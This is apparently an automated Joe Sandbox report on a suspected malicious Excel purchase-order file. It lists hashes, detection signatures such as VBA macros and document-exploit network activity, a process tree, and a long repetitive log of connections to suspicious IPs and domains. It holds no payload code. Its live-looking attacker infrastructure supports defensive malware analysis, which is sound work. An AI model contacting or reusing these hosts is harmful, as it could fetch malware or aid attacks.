Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ORDEM DE COMPRA.xla.xlsx

Overview

General Information

Sample name:ORDEM DE COMPRA.xla.xlsx
Analysis ID:1636404
MD5:2cffe74ee266afc00cdad106cc7064a1
SHA1:5a9ad43a3a53c9ee102bbe33b21bb2c8bf3ecc76
SHA256:0d234506eca49eb07fd6caeab63c31718877d8766b657a7a1daa4ea103be954b
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 6620 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 4336 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 1220 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDEM DE COMPRA.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.161.200.29, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6620, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49697
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49697, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6620, Protocol: tcp, SourceIp: 5.161.200.29, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-12T18:35:50.560939+010020283713Unknown Traffic192.168.2.74970113.107.246.60443TCP
2025-03-12T18:35:52.974397+010020283713Unknown Traffic192.168.2.74970513.107.246.60443TCP
2025-03-12T18:35:52.998495+010020283713Unknown Traffic192.168.2.74970413.107.246.60443TCP
2025-03-12T18:35:53.013712+010020283713Unknown Traffic192.168.2.74970313.107.246.60443TCP
2025-03-12T18:36:02.706611+010020283713Unknown Traffic192.168.2.74970713.107.246.60443TCP
2025-03-12T18:36:09.912110+010020283713Unknown Traffic192.168.2.74970913.107.246.60443TCP
2025-03-12T18:36:09.983028+010020283713Unknown Traffic192.168.2.74971013.107.246.60443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ORDEM DE COMPRA.xla.xlsxAvira: detected
Source: ORDEM DE COMPRA.xla.xlsxVirustotal: Detection: 25%Perma Link
Source: ORDEM DE COMPRA.xla.xlsxReversingLabs: Detection: 36%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 5.161.200.29:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 3.39.89.152:443 -> 192.168.2.7:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: global trafficDNS query: name: st3.pro
Source: global trafficDNS query: name: link.saja.market
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49705 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49707 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49709 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.7:49697
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49697 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.7:49698
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 104.168.7.38:80 -> 192.168.2.7:49699
Source: global trafficTCP traffic: 192.168.2.7:49699 -> 104.168.7.38:80
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
